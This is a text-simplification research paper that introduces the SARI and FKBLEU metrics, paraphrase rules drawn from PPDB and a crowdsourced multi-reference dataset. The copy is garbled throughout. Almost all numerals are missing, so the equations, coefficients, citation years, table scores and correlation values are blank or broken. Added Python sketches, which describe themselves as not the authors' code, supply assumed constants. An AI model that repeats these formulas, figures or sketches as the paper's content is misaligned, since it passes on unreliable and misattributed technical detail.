strube ; filippova et al. ; rush et al. ; and others) have been intensively studied, there has been considerably less research on developing new para- phrasing models for text simplification — most pre- vious work has used off-the-shelf statistical machine translation (smt) technology and achieved reason- able results (coster and kauchak, a,b; wubben et al., ; štajner et al., ). 
however, they have either treated the underlying smt technology as a black box (coster and kauchak, a,b; narayan and gardent, ; angrosh et al., ; štajner et al., ) or they have been limited to modifying only one aspect of it, such as the translation model (zhu et al., ; woodsend and lapata, ) or the reranking component (wubben et al., ). in this paper, we present a complete adaptation of a syntax-based machine translation framework to perform simplification. our methodology poses text simplification as a paraphrasing problem: given an input text, rewrite it subject to the constraints that the output should be simpler than the input, while preserving as much meaning of the input as possible, and maintaining the well-formedness of the text. going beyond previous work, we make direct modifications to four key components in the smt pipeline: ) two novel simplification-specific tunable metrics; ) large-scale paraphrase rules automatically derived from bilingual parallel corpora, which are more naturally and abundantly available than manually simplified texts; ) rich rule-level simplification features; and ) multiple reference simplifications collected via crowdsourcing for tuning and evaluation. in particular, we report the first study that shows promising correlations of automatic metrics with human evaluation. our work answers the call made in a recent tacl paper (xu et al., ) to address problems in current simplification research — we amend human evaluation criteria, develop automatic metrics, and generate an improved multiple reference dataset. our work is primarily focused on lexical simplification (rewriting words or phrases with simpler versions), and to a lesser extent on syntactic rewrite rules that simplify the input. it largely ignores the important subtasks of sentence splitting and deletion. our focus on lexical simplification does not affect the generality of the presented work, since deletion or sentence splitting could be applied as pre- or post-processing steps. background xu et al. ( ) laid out a series of problems that are present in current text simplification research, and argued that we should deviate from the previous state-of-the-art benchmarking setup. first, the simple english wikipedia data has dominated simplification research since (zhu et al., ; siddharthan, ), and is used together with standard english wikipedia to create parallel text to train mt-based simplification systems. however, recent studies (xu et al., ; amancio and specia, ; hwang et al., ; štajner et al., ) showed that the parallel wikipedia simplification corpus contains a large proportion of inadequate (not much simpler) or inaccurate (not aligned or only partially aligned) simplifications. it is one of the leading reasons that existing simplification systems struggle to generate simplifying paraphrases and leave the input sentences unchanged (wubben et al., ). our code and data are made available at: https://github.com/cocoxu/simplification/ previously researchers attempted some quick fixes by adding phrasal deletion rules (coster and kauchak, a) or reranking n-best outputs based on their dissimilarity to the input (wubben et al., ).
in contrast, we exploit data with im- proved quality and enlarged quantity, namely, large- scale paraphrase rules automatically derived from bilingual corpora and a small amount of manual simplification data with multiple references for tun- ing parameters. we then systematically design new tuning metrics and rich simplification-specific fea- tures into a syntactic machine translation model to enforce optimization towards simplicity. this ap- proach achieves better simplification performance without relying on a manually simplified corpus to learn paraphrase rules, which is important given the fact that simple wikipedia and the newly released newsela simplification corpus (xu et al., ) are only available for english. second, previous evaluation used in the simplifi- cation literature is uninformative and not compara- ble across models due to the complications between the three different operations of paraphrasing, dele- tion, and splitting. this, combined with the unreli- able quality of simple wikipedia as a gold reference for evaluation, has been the bottleneck for develop- ing automatic metrics. there exist only a few stud- ies (wubben et al., ; štajner et al., ) on au- tomatic simplification evaluation using existing mt metrics which show limited correlation with human assessments. in this paper, we restrict ourselves to lexical simplification, where we believe mt-derived evaluation metrics can best be deployed. our newly proposed metric is the first automatic metric that shows reasonable correlation with human evalua- tion on the text simplification task. we also intro- duce multiple references to make automatic evalua- tion feasible. the most related work to ours is that of gan- itkevitch et al. ( ) on sentence compression, in which compression of word and sentence lengths can be more straightforwardly implemented in fea- tures and the objective function in the smt frame- work. we want to stress that sentence simplifica- tion is not a simple extension of sentence compres- sion, but is a much more complicated task, primarily because high-quality data is much harder to obtain and the solution space is more constrained by word choice and grammar. our work is also related to other tunable metrics designed to be very simple and light-weight to ensure fast repeated computation for tuning bilingual translation models (liu et al., ; chen et al., a). to the best of our knowledge, no tunable metric has been attempted for simplifica- tion, except for bleu. nor do any evaluation met- rics exist for simplification, although there are sev- eral designed for other text-to-text generation tasks: grammatical error correction (napoles et al., ; felice and briscoe, ; dahlmeier and ng, ), paraphrase generation (chen and dolan, ; xu et al., ; sun and zhou, ), and conversation generation (galley et al., ). another line of re- lated work is lexical simplification that focuses on finding simpler synonyms of a given complex word (yatskar et al., ; biran et al., ; specia et al., ; horn et al., ). adapting machine translation for simplification we adapt the machinery of statistical machine trans- lation to the task of text simplification by making changes in the following four key components: . simplification-specific objective functions in the statistical machine translation framework, one crucial element is to design automatic evaluation metrics to be used as training objectives. 
training algorithms, such as mert (och, ) or pro (hopkins and may, ), then directly optimize the model parameters such that the end-to-end simplification quality is optimal. unfortunately, previous work on text simplification has only used bleu for tuning, which is insufficient as we show empirically in section . we propose two new light-weight metrics instead: fkbleu that explicitly measures readability and sari that implicitly measures it by comparing against the input and references. unlike machine translation metrics which do not compare against the (foreign) input sentence, it is necessary to compare simplification system outputs against the inputs to assess readability changes. it is also important to keep tunable metrics as simple as possible, since they are repeatedly computed during the tuning process for hundreds of thousands of candidate outputs. fkbleu our first metric combines a previously proposed metric for paraphrase generation, ibleu (sun and zhou, ), and the widely used readability metric, flesch-kincaid index (kincaid et al., ). ibleu is an extension of the bleu metric to measure diversity as well as adequacy of the generated paraphrase output. given a candidate sentence o, human references r and input text i, ibleu is defined as: ibleu = α × bleu(o, r) − ( − α) × bleu(o, i) ( ) where α is a parameter balancing adequacy and dissimilarity, set empirically as suggested by sun and zhou ( ). since the text simplification task aims at improving readability, we include the flesch-kincaid index (fk), which estimates the readability of text using cognitively motivated features (kincaid et al., ): fk = . × (#words / #sentences) + . × (#syllables / #words) − . ( ) with a lower value indicating higher readability. we adapt fk to score individual sentences and change it so that it counts punctuation tokens as well as words, and counts each punctuation token as one syllable. this prevents it from arbitrarily deleting punctuation. fk measures readability assuming that the text is well-formed, and therefore is insufficient alone as a metric for generating or evaluating automatically generated sentences. combining fk and ibleu captures both a measure of readability and adequacy. the resulting objective function, fkbleu, is defined as a geometric mean of the ibleu and the fk difference between input and output sentences: fkbleu = ibleu(i, r, o) × fkdiff(i, o), fkdiff = sigmoid(fk(o) − fk(i)) ( ) sentences with higher fkbleu values are better simplifications with higher readability. the fk coefficients were derived via multiple regression applied to the reading comprehension test scores of navy personnel reading training manuals. these values are typically used unmodified, as we do here. sari we design a second new metric sari that principally compares system output against references and against the input sentence. it explicitly measures the goodness of words that are added, deleted and kept by the systems (figure ). we reward addition operations, where system output o was not in the input i but occurred in any of the references r, i.e. o ∩ ī ∩ r.
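before completing the definition of sari, the following python sketch shows one way the fkbleu objective just defined could be computed for a single tokenized sentence. it is only an illustration, not the authors' released implementation: bleu is passed in as a stand-in callable (e.g. a thin wrapper around nltk.translate.bleu_score.sentence_bleu), the syllable counter is a crude heuristic, the flesch-kincaid coefficients are the standard published values assumed here because they are elided in this copy, and the default alpha is likewise only an assumption. a sketch of sari follows its full definition below.

```python
import math

def count_syllables(word):
    # rough vowel-group heuristic; punctuation tokens get one syllable,
    # mirroring the sentence-level adaptation of fk described above
    groups, prev = 0, False
    for ch in word.lower():
        is_vowel = ch in "aeiouy"
        if is_vowel and not prev:
            groups += 1
        prev = is_vowel
    return max(groups, 1)

def fk(tokens):
    # sentence-level flesch-kincaid grade (#sentences = 1); the coefficients
    # 0.39, 11.8, 15.59 are the standard published values, assumed here
    words = len(tokens)
    syllables = sum(count_syllables(t) for t in tokens)
    return 0.39 * words + 11.8 * (syllables / words) - 15.59

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def ibleu(output, references, source, bleu, alpha=0.9):
    # alpha balances adequacy (against references) and dissimilarity (against the input);
    # 0.9 is an assumed default, since the paper's empirical value is not shown here
    return alpha * bleu(output, references) - (1 - alpha) * bleu(output, [source])

def fkbleu(output, references, source, bleu, alpha=0.9):
    # product of ibleu and the sigmoid-squashed readability difference
    fkdiff = sigmoid(fk(output) - fk(source))
    return ibleu(output, references, source, bleu, alpha) * fkdiff
```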
we define n-gram precision p(n) and recall r(n) for addition opera- tions as follows: padd(n) = ∑ g∈o min ( #g(o ∩ i), #g(r) ) ∑ g∈o #g(o ∩ i) radd(n) = ∑ g∈o min ( #g(o ∩ i), #g(r) ) ∑ g∈o #g(r ∩ i) ( ) where #g(·) is a binary indicator of occurrence of n- grams g in a given set (and is a fractional indicator in some later formulas) and #g(o ∩ i) = max(#g(o)−#g(i), ) #g(r ∩ i) = max(#g(r)−#g(i), ) therefore, in the example below, the addition of un- igram now is rewarded in both padd(n) and radd(n), while the addition of you in output- is penalized in padd(n): input: about species are currently accepted . ref- : about species are currently known . ref- : about species are now accepted . ref- : species are now accepted . output- : about you now get in . output- : about species are now agreed . output- : about species are currently agreed. the corresponding sari scores of these three toy outputs are . , . , . , which match with intuitions about their quality. to put it in perspective, the bleu scores are . , . , . respectively. bleu fails to distinguish be- tween output- and output- because match- ing any one of references is credited the same. not all the references are necessarily complete simpli- fications, e.g. ref- doesn’t simplify the word in the rare case when the denominator is in calculating precision p or recall r, we simply set the value of p and r to . input system outputhuman references input that is unchanged by system and which is not in the reference input that is retained in the references, but was deleted by the system overlap between all input that was correctly deleted by the system, and replaced by content from the references potentially incorrect system output figure : metrics that evaluate the output of monolingual text-to-text generation systems can compare system out- put against references and against the input sentence, un- like in mt metrics which do not compare against the (for- eign) input sentence. the different regions of this venn diagram are treated differently with our sari metric. currently, which gives bleu too much latitude for matching the input. words that are retained in both the system out- put and references should be rewarded. when mul- tiple references are used, the number of references in which an n-gram was retained matters. it takes into account that some words/phrases are considered simple and are unnecessary (but still encouraged) to be simplified. we use r′ to mark the n-gram counts over r with fractions, e.g. 
if a unigram (word about in above example) occurs in out of the total r ref- erences, then its count is weighted by /r in compu- tation of precision and recall: pkeep(n) = ∑ g∈i min ( #g(i ∩o), #g(i ∩r′) ) ∑ g∈i #g(i ∩o) rkeep(n) = ∑ g∈i min ( #g(i ∩o), #g(i ∩r′) ) ∑ g∈i #g(i ∩r′) ( ) where #g(i ∩o) = min ( #g(i), #g(o) ) #g(i ∩r′) = min ( #g(i), #g(r)/r ) for deletion, we only use precision because over- deleting hurts readability much more significantly than not deleting: pdel(n) = ∑ g∈i min ( #g(i∩o),#g(i∩r′) ) ∑ g∈i #g(i∩o) ( ) where #g(i ∩o) = max ( #g(i)−#g(o), ) #g(i ∩r′) = max ( #g(i)−#g(r)/r, ) [rb] solely → only lexical [nn] objective → goal [jj] undue → unnecessary [vp] accomplished → carried out phrasal [vp/pp] make a significant contribution → contribute greatly [vp/s] is generally acknowledged that → is widely accepted that [np/vp] the manner in which nn → the way nn syntactic [np] nnp ’s population → the people of nnp [np] nnp ’s jj legislation → the jj law of nnp table : example paraphrase rules in the paraphrase database (ppdb) that result in simplifications of the input. the rules are synchronous context-free grammar (scfg) rules where uppercase indicates non-terminal symbols. non- terminals can be complex symbols like vp/s which indicates that the rule forms a verb phrase (vp) missing a sentence (s) to its right. the final syntactic rule both simplifies and reorders the input phrase. the precision of what is kept also reflects the suf- ficiency of deletions. the n-gram counts are also weighted in r′ to compensate n-grams, such as the word currently in the example, that are not consid- ered as required simplification by human editors. together, in sari, we use arithmetic average of n-gram precisions poperation and recalls roperation: sari = d fadd + d fkeep + d pdel ( ) where d = d = d = / and poperation = k ∑ n=[ ,...,k] poperation(n) roperation = k ∑ n=[ ,...,k] roperation(n) foperation = ×poperation ×roperation poperation + roperation operation ∈ [del,keep,add] where k is the highest n-gram order and set to in our experiments. . incorporating large-scale paraphrase rules another challenge for text simplification is generat- ing an ample set of rewrite rules that potentially sim- plify an input sentence. most early work has relied on either hand-crafted rules (chandrasekar et al., ; carroll et al., ; siddharthan, ; vick- rey and koller, ) or dictionaries like wordnet (devlin et al., ; kaji et al., ; inui et al., ). other more recent studies have relied on the parallel normal-simple wikipedia corpus to au- tomatically extract rewrite rules (zhu et al., ; woodsend and lapata, ; coster and kauchak, b; wubben et al., ; narayan and gar- dent, ; siddharthan and angrosh, ; an- grosh et al., ). this technique does manage to learn a small number of transformations that sim- plify. however, we argue that because the size of the normal-simple wikipedia parallel corpus is quite small ( k sentence pairs with million words), the diversity and coverage of patterns that can be learned is actually quite limited. in this paper we will leverage the large-scale para- phrase database (ppdb) (ganitkevitch et al., ; pavlick et al., ) as a rich source of lexical, phrasal and syntactic simplification operations. it is created by extracting english paraphrases from bilingual parallel corpora using a technique called “bilingual pivoting” (bannard and callison-burch, ). 
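before describing ppdb further, a deliberately simplified, unigram-only python sketch of the sari computation defined in the previous subsection may help make the add/keep/delete bookkeeping concrete. it is not the released implementation: the published metric averages precisions and recalls over n-gram orders up to k and uses fractional reference counts exactly as in the formulas, while the handling of zero denominators below is a sketch choice because the paper's exact value is not shown in this copy.

```python
def _f1(p, r):
    return 0.0 if p + r == 0 else 2 * p * r / (p + r)

def _safe(num, den):
    # guard against empty sets; the paper treats zero denominators as a
    # special case (value elided in this copy), so 1.0 here is a sketch choice
    return num / den if den > 0 else 1.0

def sari_unigram(source, output, references):
    # source and output are token lists; references is a list of token lists
    i_set, o_set = set(source), set(output)
    ref_sets = [set(r) for r in references]
    r_union = set().union(*ref_sets)
    num_refs = len(references)
    # fraction of references containing each token (the fractional r' counts)
    ref_frac = {g: sum(g in rs for rs in ref_sets) / num_refs for g in r_union}

    # addition: tokens in the output that were not in the input
    added = o_set - i_set
    good_added = added & r_union
    p_add = _safe(len(good_added), len(added))
    r_add = _safe(len(good_added), len(r_union - i_set))

    # keep: input tokens retained in the output, credited by how many references keep them
    kept = i_set & o_set
    keep_credit = sum(ref_frac.get(g, 0.0) for g in kept)
    p_keep = _safe(keep_credit, len(kept))
    r_keep = _safe(keep_credit, sum(ref_frac.get(g, 0.0) for g in i_set))

    # deletion: precision only, credited in proportion to references that also drop the token
    deleted = i_set - o_set
    del_credit = sum(1.0 - ref_frac.get(g, 0.0) for g in deleted)
    p_del = _safe(del_credit, len(deleted))

    return (_f1(p_add, r_add) + _f1(p_keep, r_keep) + p_del) / 3.0

# toy run loosely based on the worked example above (unigrams only; not
# expected to reproduce the paper's reported scores)
src = "about species are currently accepted".split()
out = "about species are now agreed".split()
refs = ["about species are currently known".split(),
        "about species are now accepted".split(),
        "species are now accepted".split()]
print(round(sari_unigram(src, out, refs), 3))
```

the ppdb rules described next supply the candidate rewrites whose added, kept and deleted words a metric like this scores.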
the ppdb is represented as a synchronous context-free grammar (scfg), which is commonly used as the formalism for syntax-based machine translation (zollmann and venugopal, ; chiang, ; weese et al., ). table shows some ex- ample paraphrase rules in the ppdb. ppdb employs times more data ( mil- lion sentence pairs with billion words) than the normal-simple wikipedia parallel corpus. the en- glish portion of ppdb contains over million paraphrase rules, consisting of million lexical, million phrasal and million syntactic para- http://paraphrase.org phrase patterns. the key differences between the paraphrase rules from ppdb and the transforma- tions learned by the naive application of smt to the normal-simple wikipedia parallel corpus, are that the ppdb paraphrases are much more diverse. for example, ppdb contains paraphrases for ancient including antique, ancestral, old, age-old, archeological, former, antiquated, longstanding, ar- chaic, centuries-old, and so on. however, there is nothing inherent in the rule extraction process to say which of the ppdb paraphrases are simplifications. in this paper, we model the task by incorporating rich features into each rule and let smt advances in decoding and optimization determine how well a rule simplifies an input phrase. an alternative way of using ppdb for simplification would be to sim- ply discard any of its rules which did not result in a simplified output, possibly using a simple super- vised classifier (pavlick and callison-burch, ). . simplification-specific features for paraphrase rules designing good features is an essential aspect of modeling. for each input sentence i and its candi- date output sentence j, a vector of feature functions ~ϕ = {ϕ ...ϕn} are combined with a weight vector ~w in a linear model to obtain a single score h~w: h~w(i,j) = ~w · ~ϕ(i,j) ( ) in smt, typical feature functions are phrase trans- lation probabilities, word-for-word lexical transla- tion probabilities, a rule application penalty (which governs whether the system prefers fewer longer phrases or a greater number of shorter phrases), and a language model probability. together these fea- tures are what the model uses to distinguish between good and bad translations. for monolingual transla- tion tasks, previous research suggests that features like paraphrase probability and distributional sim- ilarity are potentially helpful in picking out good paraphrases (chan et al., ) and for text-to-text generation (ganitkevitch et al., b). while these two features quantify how good a paraphrase rule is in general, they do not indicate how good the rule is for a specific task, like simplification. for each paraphrase rule, we use all the fea- tures that were distributed with ppdb . and add new features for simplification purposes: length in characters, length in words, number of syllables, language model scores, and fraction of common en- glish words in each rule. these features are com- puted for both sides of a paraphrase pattern, the word with the maximum number of syllables on each side and the difference between the two sides, when it is applicable. we use language models built from the gigaword corpus and the simple wikipedia corpus collected by kauchak ( ). we also use a list of most common us english words compiled by paul and bernice noll. . creating multiple references like with machine translation, where there are many equally good translations, in simplification there may be several ways of simplifying a sentence. 
most previous work on text simplification only uses a sin- gle reference simplification, often from the simple wikipedia. this is undesirable since the simple wikipedia contains a large proportion of inadequate or inaccurate simplifications (xu et al., ) . in this study, we collect multiple human reference simplifications that focus on simplification by para- phrasing rather than deletion or splitting. we first selected the simple-normal sentence pairs of simi- lar length (≤ % differences in number of tokens) from the parallel wikipedia simplification (pwkp) corpus (zhu et al., ) that are more likely to be paraphrase-only simplifications. we then asked workers on amazon mechanical turk to rewrite a selected sentence from normal wikipedia (a subset of pwkp) into a simpler version while preserving its meaning, without losing any information or split- ting sentence. we removed bad workers by man- ual inspection on the worker’s first several submis- sions on the basis of a recent study (gao et al., ) on crowdsourcing translation that suggests turkers’ performance stays consistent over time and can be reliably predicted by their first few translations. in total, we collected reference simplifications for sentences, and randomly split them into sentences for tuning, for evaluation. many crowdsourcing workers were able to provide simpli- fications of good quality and diversity (see table we release the data with details for each feature. http://www.manythings.org/vocabulary/ lists/l/noll-about.php for an example and table for the manual quality evaluation). having multiple references allows us to develop automatic metrics similar to bleu to take advantage of the variation across many people’s sim- plifications. we leave more in-depth investigations on crowdsourcing simplification (pellow and eske- nazi, a,b) for future work. . tuning parameters like in statistical machine translation, we set the weights of the linear model ~w in the equation ( ) so that the system’s output is optimized with re- spect to the automatic evaluation metric on the sentence development set. we use the pairwise ranking optimization (pro) algorithm (hopkins and may, ) implemented in the open-source joshua toolkit (ganitkevitch et al., a; post et al., ) for tuning. specifically, we train the system to distinguish a good candidate output j from a bad candidate j′, measured by an objective function o (section . ), for an input sentence i: o(i,j) >o(i,j′) ⇐⇒ h~w(i,j) > h~w(i,j′) ⇐⇒ h~w(i,j)−h~w(i,j′) > ⇐⇒ ~w · ~ϕ(i,j)− ~w · ~ϕ(i,j′) > ⇐⇒ ~w · (~ϕ(i,j)− ~ϕ(i,j′)) > ( ) thus, the optimization reduces to a binary classifi- cation problem. each training instance is the dif- ference vector ~ϕ(i,j) − ~ϕ(i,j′)) of a pair of can- didates, and its training label is positive or negative depending on whether the value of o(i,j) −o(i,j′) is positive or negative. the candidates are generated according to h~w at each iteration, and sampled for making the training tractable. we use different met- rics: bleu, fkbleu and sari as objectives. experiments and analyses we implemented all the proposed adaptations into the open source syntactic machine translation de- coder joshua (post et al., ), and conducted the experiments with ppdb and the dataset of sentences collected in section . . most recent http://joshua-decoder.org/ we augment its lat- est version to include the text-to-text generation functionality described in this paper. paraphrase rule trans. model score principal → key . principal → main . principal → major . principal → chief . 
principal → core . principal → principal . principal → top . principal → senior . principal → lead . principal → primary . principal → prime . principal → keynote - . able-bodied → valid . able-bodied → sound . able-bodied → healthy . able-bodied → able-bodied . able-bodied → job-ready . able-bodied → employable - . able-bodied → non-disabled - . table : qualitative analysis of candidate paraphrases ranked by the translation model in sbmt (ppdb + sari), showing that the model is optimized towards sim- plicity in addition to the correctness of paraphrases. the final simplifications (in bold) are chosen in conjunction with the language model to fit the context and further bias towards more common n-grams. end-to-end sentence simplification systems use a basic phrase-based mt model trained on parallel wikipedia data using the moses decoder (štajner et al., , and others). one of the best systems is pbmt-r by wubben et al. ( ), which reranks moses’ n-best outputs based on their dissimilarity to the input to promote simplification. we also build a baseline by using bleu as the tuning metric in our adapted mt framework. we conduct both human and automatic evaluation to demonstrate the advan- tage of the proposed simplification systems. we also show the effectiveness of the two new metrics in tun- ing and automatic evaluation. . qualitative analysis table shows a representative example of the sim- plification results. the pbmt-r model failed to learn any good substitutions for the word able- bodied or the phrase are required to from the man- ually simplified corpora of limited size. in contrast, our proposed method can make use of more para- sentence normal wikipedia jeddah is the principal gateway to mecca, islam’s holiest city, which able-bodied muslims are required to visit at least once in their lifetime. simple wikipedia jeddah is the main gateway to mecca, the holiest city of islam, where able-bodied muslims must go to at least once in a lifetime. mechanical turk # jeddah is the main entrance to mecca, the holiest city in islam, which all healthy muslims need to visit at least once in their life. mechanical turk # jeddah is the main entrance to mecca, islam’s holiest city, which pure muslims are re- quired to visit at least once in their lifetime. pbmt-r (wubben et al., ) jeddah is the main gateway to mecca, islam’s holiest city, which able-bodied muslims are required of muslims at least once in their lifetime. sbmt (ppdb + bleu) jeddah is the main door to mecca, islam’s holiest city, which sound muslims are to go to at least once in their life. sbmt (ppdb + fkbleu) jeddah is the main gateway to mecca, islam’s holiest city, which sound muslims must visit at least once in their life. sbmt (ppdb + sari) jeddah is the main gateway to mecca, islam’s holiest city, which sound muslims have to visit at least once in their life. table : example human reference simplifications and automatic simplification system outputs. the bold font high- lights the parts of the sentence that are different from the original version in the normal wikipedia, and strikethrough denotes deletions. phrases learned from the more abundant bilingual texts. it improves method applicability to languages other than english, for which no simpler version of wikipedia is available. our proposed approach also provides an intu- itive way to inspect the ranking of candidate para- phrases in the translation model. this is done by scoring each rule in ppdb by equation using the weights optimized in the tuning process, as in ta- ble . 
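the ranking in that table comes from nothing more than the linear model of equation ( ): each rule's feature vector is dotted with the tuned weight vector. the following is a hypothetical sketch of that scoring; the feature names, values and weights are invented purely for illustration and are not the ppdb feature set or the tuned weights.

```python
def count_syllables(word):
    # rough vowel-group heuristic used only for the illustrative features below
    groups, prev = 0, False
    for ch in word.lower():
        v = ch in "aeiouy"
        if v and not prev:
            groups += 1
        prev = v
    return max(groups, 1)

def simplification_features(source_phrase, target_phrase, common_words):
    # a few simplification-oriented features of a paraphrase rule (hypothetical names)
    s, t = source_phrase.split(), target_phrase.split()
    return {
        "delta_chars": len(source_phrase) - len(target_phrase),
        "delta_syllables": sum(map(count_syllables, s)) - sum(map(count_syllables, t)),
        "target_common_frac": sum(w in common_words for w in t) / max(len(t), 1),
    }

def score_rule(features, weights):
    # h(i, j) = w . phi(i, j): dot product of feature values and (tuned) weights
    return sum(weights.get(name, 0.0) * value for name, value in features.items())

# usage with invented weights: a rule that shortens the phrase and lands on
# common english words gets a higher score
common = {"only", "main", "key", "top", "goal"}
weights = {"delta_chars": 0.05, "delta_syllables": 0.3, "target_common_frac": 1.0}
for target in ["key", "main", "principal"]:
    feats = simplification_features("principal", target, common)
    print(target, round(score_rule(feats, weights), 3))
```

table applies exactly this kind of scoring, with the weights learned during tuning, to the candidate paraphrases for principal and able-bodied.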
it shows that our proposed method is capable of capturing the notion of simplicity using a small amount of parallel tuning data. it correctly ranks key and main as good simplifications for principal. its choices are not always perfect as it prefers sound over healthy for able-bodied. the final simplifi- cation outputs are generated according to both the translation model and the language model trained on the gigaword corpus to take into account context and further bias towards more common n-grams. . quantitative evaluation of simplification systems for the human evaluation, participants were shown the original english wikipedia sentence as a ref- erence and asked to judge a set of simplifications that were displayed in random order. they eval- uated a simplification from each system, the sim- ple wikipedia version, and a turker simplification. judges rated each simplification on two -point scales of meaning retention and grammaticality ( is the worst and is the best). we also ask partici- pants to rate simplicity gain (simplicity+) by count- ing how many successful lexical or syntactic para- phrases occurred in the simplification. we found this makes the judgment easier and that it is more infor- mative than rating the simplicity directly on -point scale, since the original sentences have very differ- ent readability levels to start with. more importantly, using simplicity gain avoids over-punishment of er- rors, which are already penalized for poor meaning retention and grammaticality, and thus reduces the bias towards very conservative models. we collect judgments on these three criteria from five different annotators and report the average scores. table shows that our best system, a syntactic- based mt system (sbmt) using ppdb as the source of paraphrase rules and tuning towards the sari metric, achieves better performance in all three simplification measurements than the state-of- the-art system pbmt-r. the relatively small val- ues of simplicity gain, even for the two human ref- erences (simple wikipedia and mechanical turk), clearly show the major challenge of simplification, which is the need of not only generating paraphrases but also ensuring the generated paraphrases are sim- pler while fitting the contexts. although many re- searchers have noticed this difficulty, pbmt-r is one of the few that tried to address it by promoting grammar meaning simplicity+ #tokens #chars edit dist. normal wikipedia . . . . simple wikipedia . . . . mechanical turk . . . . pbmt-r (wubben et al., ) . . . . sbmt (ppdb + bleu) . . . . sbmt (ppdb + fkbleu) . . . . sbmt (ppdb + sari) . . . . table : human evaluation (grammar, meaning, simplicity+) and basic statistics of our proposed systems (sbmts) and baselines. pbmt-r is an reimplementation of the state-of-the-art system by wubben et al. ( ). newly proposed metrics fkbleu and sari show advantages for tuning. fk bleu ibleu fkbleu sari normal wikipedia . . . . . simple wikipedia . . . . . mechanical turk . . . . . pbmt-r (wubben et al., ) . . . . . sbmt (ppdb + bleu) . . . . . sbmt (ppdb + fkbleu) . . . . . sbmt (ppdb + sari) . . . . . table : automatic evaluation of different simplification systems. most systems achieve similar fk readability scores as human. the sari metric ranks all different systems and human references in the same order as human assess- ment. tuning towards bleu with all references results in identical transformation (same as normal wikipedia), as this can get a near-perfect bleu score of . (out of ). 
outputs that are dissimilar to the input. our best sys- tem is able to make more effective paraphrases (bet- ter simplicity+) while introducing less errors (better grammar and meaning). table shows the automatic evaluation. an en- couraging fact is that sari metric ranks all dif- ferent systems and human references in the same order as human assessment. most systems achieve similar fk readability as human editors, using fewer words or words with fewer syllables. tuning to- wards bleu with all references results in no trans- formation (same as input), as this can get a near- perfect bleu score of . (out of ). table shows the computation time for different metrics. sari is only slightly slower than bleu but achieves much better simplification quality. time (milliseconds) bleu . fkbleu . sari . table : average computation time of different metrics per candidate sentence. . correlation of automatic metrics with human judgments table shows the correlation of automatic metrics with human judgment. there are several interesting observations. first, simplicity is essential in measuring the goodness of simplification. however, none of the existing metrics (i.e. fk, bleu, ibleu) demon- strate any significant correlation with the simplicity scores rated by humans, same as noted in previous work (wubben et al., ; štajner et al., ). in contrast, our two new metrics, fkbleu and sari, achieve a much better correlation with humans in simplicity judgment while still capturing the notion of grammaticality and meaning preservation. this explains why they are more suitable than bleu to be used in training the simplification models. in particular, sari provides a balanced and integrative measurement of system performance that can assist iterative development. to date, developing advanced simplification systems has been a difficult and time- consuming process, since it is impractical to run new spearman’s ρ ref. grammar meaning simplicity+ fk none - . (≈ . ) . (<. ) . (<. ) bleu single . (<. ) . (<. ) . (<. ) bleu multiple . (<. ) . (<. ) . (<. ) ibleu single . (<. ) . (<. ) . (<. ) ibleu multiple . (<. ) . (<. ) . (<. ) fkbleu multiple . (<. ) . (<. ) . (<. ) sari multiple . (<. ) . (<. ) . (<. ) table : correlations (and two-tailed p-values) of metrics against the human ratings at sentence-level (also see figure ). in this work, we propose to use multiple (eight) references and two new metrics: fkbleu and sari. for all three criteria of simplification quality, sari correlates reasonably with human judgments. in contrast, previous works use only a single reference. existing metrics bleu and ibleu show higher correlations on grammaticality and meaning preservation using multiple references, but fail to measure the most important aspect of simplification – simplicity. human evaluation every time a new model is built or parameters are adjusted. second, the correlation of automatic metrics with human judgment of grammaticality and meaning preservation is higher than any reported before (wubben et al., ; štajner et al., ). it val- idates our argument that constraining simplification to only paraphrasing reduces the complication from deletion and splitting, and thus makes automatic evaluation more feasible. using multiple references further improves the correlations. . why does bleu correlate strongly with meaning/grammar, and sari with simplicity? here we look more deeply at the correlations of bleu and sari with human judgments. 
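as a brief note on how such sentence-level correlations can be computed, the sketch below uses an off-the-shelf rank correlation; the variable names and numbers are placeholders, not the paper's data.

```python
# placeholder data; only the use of spearman's rho is the point here
from scipy.stats import spearmanr

def metric_human_correlation(metric_scores, human_ratings):
    # both arguments are per-sentence lists aligned by test-sentence index
    rho, p_value = spearmanr(metric_scores, human_ratings)
    return rho, p_value

sari_scores = [0.41, 0.22, 0.35, 0.28, 0.50]   # toy numbers
simplicity_ratings = [2, 0, 1, 1, 3]           # toy simplicity+ counts
print(metric_human_correlation(sari_scores, simplicity_ratings))
```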
our sari metric has the highest correlation with human judgments of simplicity, but bleu exhibits higher correlations on grammaticality and meaning preservation. bleu was designed to evaluate bilingual translation systems. it measures the n-gram precision of a system's output against one or more references. bleu ignores recall (and compensates for this with its brevity penalty). bleu prefers an output that is not too short and contains only n-grams that appear in any reference. the role of multiple references in bleu is to capture allowable variations in translation quality. when applied to monolingual tasks like simplification, bleu does not take into account anything about the differences between the input and the references. in contrast, sari takes into account both precision and recall, by looking at the difference between the references and the input sentence. figure : a scatter plot of bleu scores vs. sari scores for the individual sentences in our test set. the metrics' scores for many sentences substantially diverge. few of the sentences that scored perfectly in bleu receive a high score from sari. in this work, we use multiple references to capture many different ways of simplifying the input. unlike bilingual translation, the more references created for the monolingual simplification task the more n-grams of the original input will be included in the references. that means, with more references, outputs that are close or identical to the input will get high bleu. outputs with few changes also receive high grammar/meaning scores from human judges; but these do not necessarily get high sari scores, nor are they good simplifications. bleu therefore tends to favor conservative systems that do not make many changes, while sari penalizes them. this can be seen in figure where sentences with a bleu score of . receive a range of scores from sari. figure : scatter plots of automatic metrics against human scores for individual sentences (panels: sari vs. grammar, sari vs. meaning, sari vs. simplicity, bleu vs. grammar, bleu vs. meaning, bleu vs. simplicity; automatic score on the horizontal axis, human score on the vertical axis). the scatter plots in figure further illustrate the above analysis. these plots emphasize the correlation of high human scores on meaning/grammar for systems that make few changes (which bleu rewards, but sari does not). the tradeoff is that conservative outputs with few or no changes do not result in increased simplicity. sari correctly rewards systems that make changes that simplify the input. conclusions and future work in this paper, we presented an effective adaptation of statistical machine translation techniques. we find the approach promising in suggesting two new directions: designing tunable metrics that correlate with human judgements and using simplicity-enriched paraphrase rules derived from larger data than the normal-simple wikipedia dataset. for future work, we think it might be possible to design a universal metric that works for multiple text-to-text generation tasks (including sentence simplification, compression and error correction), at the same time using the same idea of comparing system output against multiple references and against the input. the metric could possibly include tunable parameters or weighted human judgments on references to accommodate different tasks.
